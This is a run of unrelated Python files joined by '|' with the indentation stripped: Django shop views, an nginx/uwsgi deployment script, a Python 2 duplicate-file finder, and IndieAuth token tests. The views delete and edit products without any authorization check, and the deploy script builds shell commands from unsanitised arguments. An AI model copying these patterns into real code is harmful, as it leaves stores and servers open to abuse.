if form.is_valid():
Product.objects.create(seller=request.user, image=form.cleaned_data['image'], name=form.cleaned_data['name'], brand=form.cleaned_data['brand'], model=form.cleaned_data['model'], year=form.cleaned_data['year'], description=form.cleaned_data['description'], price=form.cleaned_data['price'], in_stock=form.cleaned_data['in_stock'], stock_qty=form.cleaned_data['stock_qty'],
reorder_qty=form.cleaned_data['reorder_qty'], is_discount=form.cleaned_data['is_discount'], discount=form.cleaned_data['discount'], category=form.cleaned_data['category'], subcategory=form.cleaned_data['subcategory'], season=form.cleaned_data['season'], type_choice=form.cleaned_data['type_choice'], exp_date=form.cleaned_data['exp_date'], rating=form.cleaned_data['rating'])
for f in form.cleaned_data.values():
print(f)
messages.success(request, 'Product added successfully.')
form = ProductForm()
return render(request, 'product/add_products.html', {'form': form})
# PRODUCT MANAGEMENT FOR EACH CATEGORY
def product(request, id):
# This function is for view details of product
product = Product.objects.get(pk=id)
return render(request, 'product.html', {'product': product})
def delproduct(request, id):
prod = Product.objects.get(pk=id)
prod.delete()
messages.success(request, 'Product Successfully Deleted.')
return redirect('dashboard')
def updateproduct(request, id):
if id is not None:
prod = Product.objects.get(pk=id)
form = ProductForm(instance=prod)
if request.method == 'POST':
form = ProductForm(request.POST, request.FILES, instance=prod)
if form.is_valid():
form.save()
messages.success(request, 'Updated Successfully')
return redirect('dashboard')
return render(request, 'product/update_product.html', {'form': form})
# Different Product Pages
def products_electronics(request):
products = Product.objects.filter(category='Electronics')
return render(request, 'different_prods.html', {'products': products, 'category':'Electronics'})
def product_tv_appliances(request):
products = Product.objects.filter(category='TV & Appliances')
return render(request, 'different_prods.html', {'products': products, 'category': 'TV & Appliances'})
def products_men(request):
products = Product.objects.filter(category='Men')
return render(request, 'different_prods.html', {'products': products, 'category': 'Men\'s Wear'})
def products_women(request):
products = Product.objects.filter(category='Women')
return render(request, 'different_prods.html', {'products': products, 'category':'Women\'s Wear' })
def products_kids(request):
products = Product.objects.filter(category='Baby & Kids')
return render(request, 'different_prods.html', {'products': products, 'category':'Kids Wear'})
def products_pc(request):
products = Product.objects.filter(category='Computers')
return render(request, 'different_prods.html', {'products': products, 'category': 'Computers'})
def products_phones(request):
products = Product.objects.filter(category='Phones & Tablets')
return render(request, 'different_prods.html', {'products': products, 'category': 'Phones and Tablets'})
def products_books(request):
products = Product.objects.filter(category='Books')
return render(request, 'different_prods.html', {'products': products, 'category':'Books'})
def products_accessories(request):
products = Product.objects.filter(category='Accessories')
return render(request, 'different_prods.html', {'products': products, 'category':'Accessories'})
# Managing Cart
def updateitem(request):
json_data = json.loads(request.body)
productId = json_data['productId']
action = json_data['action']
print('Product ID: ', productId)
print('Action: ', action)
customer = Customer.objects.get(user=request.user)
product = Product.objects.get(pk=productId)
print(json_data)
order, created = Order.objects.get_or_create(customer=customer)
request.session['order'] = order.pk
orderItem, created = CartItem.objects.get_or_create(
order=order, product=product)
if action == 'add':
if orderItem.quantity:
orderItem.quantity += 1
else:
orderItem.quantity = 1
elif action == 'remove':
if orderItem.quantity > 0:
orderItem.quantity -= 1
else:
orderItem.quantity = 0
orderItem.save()
if request.session.get('total_price') and request.session.get('total_items_in_cart'):
order.invoice = request.session.get('total_price')
order.no_of_items = request.session.get('total_items_in_cart')
order.save()
if orderItem.quantity <= 0:
orderItem.delete()
return JsonResponse('Item was added', safe=False)
def cartitem(request):
cart = CartItem.objects.filter(order=request.session.get('order'))
print(cart.values())
invoice = 0
total_qty = 0
for item in cart:
item.total = item.product.price * item.quantity
item.save()
invoice += item.total
total_qty += item.quantity
print(invoice, total_qty)
print(item.product.name)
request.session['total_items_in_cart'] = total_qty
request.session['total_price'] = int(invoice)
return render(request, 'cart.html', {'cart': cart, 'invoice': invoice, 'total_qty': total_qty})
def checkout(request):
if request.method == 'POST':
name = request.POST.get('name')
email = request.POST.get('email')
contact = request.POST.get('contact')
addr1 = request.POST.get('addr1')
addr2 = request.POST.get('addr2')
addr3 = request.POST.get('addr3')
addr4 = request.POST.get('addr4')
addr5 = request.POST.get('addr5')
addr6 = request.POST.get('addr6')
address = f'{addr1}, {addr2}, {addr3}, {addr6},\n {addr4}, {addr5}'
billed_amount = request.POST.get('billed_amount')
request.session['billed_amount'] = billed_amount
ordered_items = []
cart_items = CartItem.objects.filter(
order=request.session.get('order'))
for item in cart_items.values():
print(item)
ordered_items.append(item)
# qs_json = serializers.serialize('json', cart_items)
# print(qs_json)
print(str(ordered_items))
order_list = OrderList(user=request.user, order=Order.objects.get(pk=request.session.get(
'order')), list_of_order=ordered_items, billed_amount=billed_amount, shipping_address=address, phone=contact)
order_list.save()
ordr = Order.objects.get(pk=request.session.get('order'))
ordr.order_date = datetime.datetime.now().date()
ordr.save()
cart_items.delete()
del request.session['total_items_in_cart']
del request.session['total_price']
return redirect('payment')
return render(request, 'product/checkout.html')
def payment(request):
import num2word
amt = num2word.word(int(float(request.session['billed_amount'])))
return render(request, 'payment.html', {'amount_words': amt})
# Footer Items
def privacy(request):
return render(request, "policy/privacy.html")
def payment_help(request):
return render(request, "help/payments.html")
def ship_info(request):
return render(request, "help/ship_info.html")
def return_help(request):
return render(request, "help/cancellation&returns.html")
def return_policy(request):
return render(request, "policy/return_policy.html")
def security(request):
return render(request, "policy/security.html")
def tandc(request):
return render(request, "policy/terms&use.html")
def faq(request):
return render(request, "help/faq.html")
# Order Tracking and Archives
def track_order(request):
cust = Customer.objects.get(user=request.user)
ordr = Order.objects.filter(customer=cust, is_complete=False)
track_info = {}
if ordr:
# print('\n',ordr.values(),"\n")
for val in ordr.values():
track_info['order_id'] = val['orderid']
track_info['shipped'] = val['is_shipped']
track_info['delivered'] = val['is_delivered']
track_info['complete'] = val['is_complete']
track_info['transaction_id'] = val['transaction_id']
track_info['customer_id'] = val['customer_id']
track_info['invoice'] = val['invoice']
track_info['no_of_items'] = val['no_of_items']
track_info['order_date'] = val['order_date']
track_info['shipping_date'] = val['shipping_date']
track_info['deliever_date'] = val['deliever_date']
track_info['status'] = val['status']
print(track_info, '\n')
if not track_info['complete']:
return render(request, 'track/trackorder.html', {'track_info':track_info})
else:
return render(request, 'track/trackorder.html', {'no_track': True})
def shopping_archive(request):
cust = Customer.objects.get(user=request.user)
ordr = Order.objects.filter(customer=cust, is_complete=False)
track_info = {}
if ordr:
# print('\n',ordr.values(),"\n")
for val in ordr.values():
track_info['order_id'] = val['orderid']
track_info['shipped'] = val['is_shipped']
track_info['delivered'] = val['is_delivered']
track_info['complete'] = val['is_complete']
track_info['transaction_id'] = val['transaction_id']
track_info['customer_id'] = val['customer_id']
track_info['invoice'] = val['invoice']
track_info['no_of_items'] = val['no_of_items']
track_info['order_date'] = val['order_date']
track_info['shipping_date'] = val['shipping_date']
track_info['deliever_date'] = val['deliever_date']
track_info['status'] = val['status']
print('\n',track_info, '\n')
if not track_info['complete']:
return render(request, 'track/prev_ordered_items.html', {'track_info': track_info})
else:
return render(request, 'track/prev_ordered_items.html', {'no_track': True})
# Searching
def searchMatch(query, item):
'''return true only if query matches the item'''
if query in item.description.lower() or query in item.name.lower() or query in item.category.lower():
return True
else:
return False
def search(request):
import math
query = request.GET.get('query')
print('I am query : ',query)
allProds = []
catprods = Product.objects.values(
'category', 'brand', 'description', 'name', 'model', 'subcategory')
cats = {item['category'] for item in catprods}
for cat in cats:
prodtemp = Product.objects.filter(category=cat)
if prodtemp is not None:
prod = [item for item in prodtemp if searchMatch(query, item)]
n = len(prod)
nSlides = n // 4 + math.ceil((n / 4) - (n // 4))
if len(prod) != 0:
allProds.append([prod, range(1, nSlides), nSlides])
if len(allProds) == 0 or len(query) < 4:
return render(request, 'search_results.html')
return render(request, 'search_results.html', {'allProds': allProds})
# Test Page for Front End Developer
def test(request):
if request.method == 'POST':
form = ProfileEditForm(request.POST, request.FILES)
else:
user = User.objects.get(username=request.user)
cust = Customer.objects.get(user=request.user)
form = ProfileEditForm()
return render(request, 'test.html', {'form': form, 'user': user, 'cust': cust})
def adminpanel(request):
return redirect(request, 'admin')
|
import os, random, time
from jennie.ubuntu.nginxfiles import *
from jennie.ubuntu.uwsgifiles import *
def deploy_django(port, domain):
dir_arr = os.getcwd().split("/")
main_dir = ""
for i in range(0, len(dir_arr)-1):
main_dir += dir_arr[i] + "/"
main_dir = main_dir[:-1]
project_dir = dir_arr[-1]
port_exchange = 95 + random.randint(10, 99)
if port == "http":
django_nginx_file = DJANGO_HTTP_CONF
os.system("ufw allow 'Nginx Full'")
elif port == "https":
django_nginx_file = DJANGO_HTTPS_CONF
os.system("sudo add-apt-repository ppa:certbot/certbot")
os.system("sudo apt install python-certbot-nginx -y")
os.system("certbot --nginx -d {}".format(domain))
os.system("ufw allow 'Nginx Full'")
else:
django_nginx_file = DJANGO_PORT_CONF.replace("PORT", port)
os.system("ufw allow {}".format(port))
domain_name = domain.replace(".", "").replace("-", "")
django_nginx_file = django_nginx_file.replace("DOMAIN_NAME", domain).replace("PORT_EXCHANGE", str(port_exchange))
uwsgi_ini_file = DJANGO_CONF.replace("PROJECT_DIR", project_dir).replace("PORT_EXCHANGE", str(port_exchange)).replace("MAIN_DIR", main_dir)
os.system("apt-get install nginx -y")
os.system("service nginx start")
os.system("pip3 install uwsgi")
os.system("mkdir /etc/uwsgi")
open("/etc/systemd/system/uwsgi.service", "w").write(UWSGI_EMPEROR_SERVICE)
open("/etc/nginx/conf.d/{}.conf".format(domain_name).format(), "w").write(django_nginx_file)
open("/etc/uwsgi/server.ini", "w").write(uwsgi_ini_file)
os.system("systemctl restart uwsgi.service")
os.system("nginx -s reload")
time.sleep(2)
print ("\n\nDjango Deployed on port {} on domain {}\n\n".format(port, domain))
|
# coding=utf-8
import os
import filecmp
import itertools
class fdups:
def __init__(self, list_of_dirs = []):
self.exclude = {'Thumbs.db'}
self.set(list_of_dirs)
def set(self, list_of_dirs):
self.list_of_dirs = list_of_dirs
self.files = []
self.filecount = 0
self.wasted_space = 0
self.dups = []
def naturalsize(self, value, format='%.1f'):
"""This function is from the humanize-0.5.1 package with some changes.
You can find the package here - https://github.com/jmoiron/humanize
It makes the file size numbers more readable."""
suffix = ('kB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB')
base = 1024
bytes = float(value)
if bytes == 1: return '1 Byte'
elif bytes < base: return '%d Bytes' % bytes
for i,s in enumerate(suffix):
unit = base ** (i+2)
if bytes < unit:
return (format + ' %s') % ((base * bytes / unit), s)
return (format + ' %s') % ((base * bytes / unit), s)
def join(self, a, b):
"""Joins paths"""
return a + '\\' + b
def docmp(self, samesize):
"""Takes a list of files with the same size and compares them to one another
to form groups of identical files."""
grp = []
for c in itertools.combinations(samesize, 2):
foundgroup = False
#print c
if filecmp.cmp(self.join(c[0][0], c[0][1]),
self.join(c[1][0], c[1][1]), shallow = False):
for gr in grp:
if (c[0] in gr) or (c[1] in gr):
foundgroup = True
if (c[0] not in gr): gr.append(c[0])
if (c[1] not in gr): gr.append(c[1])
break
if not foundgroup:
grp.append(list(c))
print '.',
return grp
def see_groups(self):
"""Shows the duplicate groups"""
for dup in self.dups:
print '\n'
for dp in dup:
print self.join(dp[0], dp[1])
def fdups(self):
"""Adds all files from all folders into a list that consists of tuples in the form
[(dir, fname, size), (dir, fname, size), ...]
sorts the files by size and sends those that have the same size to docmp()
to be compared to one another. If the function finds any files that are identical
they are added to self.dups which is a list of lists of tuples of identical files.
"""
if not self.list_of_dirs:
print 'No dirs set'
return
if self.dups:
print 'Already found the dups.'
return
print 'Collecting files'
for d in self.list_of_dirs:
if os.path.isfile(d):
self.files.append((d[:d.rfind("\\")], d[d.rfind("\\")+1:], os.path.getsize(d)))
#print self.files[-1]
else:
if d[-1] == "\\": d = d[:-1]
for curdir, subdirs, filenames in os.walk(unicode(d)):
#print curdir
for fname in filenames:
#print('\t%s' % fname)
if fname not in self.exclude:
fullpath = curdir + '\\' + fname
self.files.append((curdir, fname, os.path.getsize(fullpath)))
if not self.files: return
self.filecount = len(self.files)
print 'Sorting'
self.files.sort(key = lambda x: x[2])
prev = self.files[0]
temp = []
print 'Comparing'
for f in self.files[1:]:
if (prev[2] == f[2]):
if (temp == []):
temp.append(prev)
temp.append(f)
if (prev[2] != f[2]) or (f == self.files[-1]):
if (temp != []):
dc = self.docmp(temp)
if (dc != []):
self.dups.extend(dc)
for dc_ in dc:
self.wasted_space = self.wasted_space + (len(dc_) - 1)*dc_[0][2]
temp = []
prev = f
for dup in self.dups:
for dp in dup:
self.files.remove(dp)
print '\nInfo:'
print 'Total number of files compared: ', self.filecount
print 'Non duplicate files: ', len(self.files)
print 'Duplicate groups: ', len(self.dups)
print 'Total wasted space: ', self.naturalsize(self.wasted_space), ' (',self.wasted_space,')'
print '\nDo you want to see the duplicate groups?'
print "(y for Yes, anything else for No)"
if raw_input() == 'y':
self.see_groups()
print '\nDo you want to see the NON duplicate files? (' + str(len(self.files)) + ' files)'
print "(y for Yes, anything else for No)"
if raw_input() == 'y':
for f in self.files:
print self.join(f[0], f[1])
|
from unittest import mock
import pytest
from indieweb.models import TToken
@pytest.mark.django_db
class TestIndieAuthExchangeToken:
@pytest.fixture
def target(self):
return "/a/indieauth/token"
@pytest.fixture
def post_data(self, auth_token, client_id):
return {
"grant_type": "authorization_code",
"me": "https://b6260560dd45.ngrok.io/",
"code": auth_token,
"redirect_uri": "https://ownyourswarm.p3k.io/auth/callback",
"client_id": client_id,
}
@pytest.fixture
def ninka_mock(self, monkeypatch):
from ninka.indieauth import discoverAuthEndpoints
m = mock.Mock(discoverAuthEndpoints, autospec=True)
monkeypatch.setattr("indieweb.serializers.discoverAuthEndpoints", m)
return m
def test_valid(self, target, client, ninka_mock, post_data, t_token):
ninka_mock.return_value = {"redirect_uri": [post_data["redirect_uri"]]}
response = client.post(target, data=post_data)
assert response.status_code == 200
data = response.json()
assert data["me"] == post_data["me"]
assert len(data["access_token"]) == 40
assert data["scope"] == "create update"
t_token.refresh_from_db()
assert t_token.auth_token == ""
assert t_token.key == data["access_token"]
def test_used_token_invalid(self, target, client, ninka_mock, post_data):
ninka_mock.return_value = {"redirect_uri": [post_data["redirect_uri"]]}
response = client.post(target, data=post_data)
assert response.status_code == 400
assert response.json() == {"non_field_errors": ["Token not found"]}
assert not ninka_mock.called
def test_error_if_redirect_doesnt_match(self, target, client, ninka_mock, post_data, t_token):
post_data["redirect_uri"] = "http://local.test"
ninka_mock.return_value = {"redirect_uri": []}
response = client.post(target, data=post_data)
assert response.status_code == 400
assert response.json() == {"non_field_errors": ["Redirect uri not found on client app"]}
ninka_mock.assert_called_with(post_data["client_id"])
@pytest.mark.django_db
class TestVerifyIndieAuthToken:
@pytest.fixture
def target(self):
return "/a/indieauth/token"
def test_valid(self, target, client, t_token_access, auth_token, client_id):
client.credentials(HTTP_AUTHORIZATION=f"Bearer {auth_token}")
response = client.get(target)
assert response.status_code == 200
assert response.json() == {
"me": f"/author/{t_token_access.user.username}/",
"client_id": client_id,
"scope": "create update",
}
def test_no_header(self, target, client):
response = client.get(target)
assert response.status_code == 400
assert response.json() == {"message": "Invalid token header. No credentials provided."}
def test_no_token_found(self, target, client):
client.credentials(HTTP_AUTHORIZATION="Bearer hogehoge")
response = client.get(target)
assert response.status_code == 400
assert response.json() == {"token": ["Token not found."]}
@pytest.mark.django_db
class TestIndieAuthTokenRevoke:
@pytest.fixture
def target(self):
return "/a/indieauth/token"
@pytest.fixture
def post_data(self, auth_token, client_id):
return {
"action": "revoke",
"token": auth_token,
}
@pytest.fixture
def ninka_mock(self, monkeypatch):
from ninka.indieauth import discoverAuthEndpoints
m = mock.Mock(discoverAuthEndpoints, autospec=True)
monkeypatch.setattr("indieweb.serializers.discoverAuthEndpoints", m)
return m
def test_valid(self, target, client, ninka_mock, post_data, t_token_access, auth_token):
assert TToken.objects.filter(key=auth_token).exists() is True
response = client.post(target, data=post_data)
assert response.status_code == 200
assert TToken.objects.filter(key=auth_token).exists() is False
def test_requires_revoke(self, target, client, ninka_mock, post_data, t_token_access, auth_token):
post_data["action"] = "hoge"
assert TToken.objects.filter(key=auth_token).exists() is True
response = client.post(target, data=post_data)
assert response.status_code == 400
assert TToken.objects.filter(key=auth_token).exists() is True
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.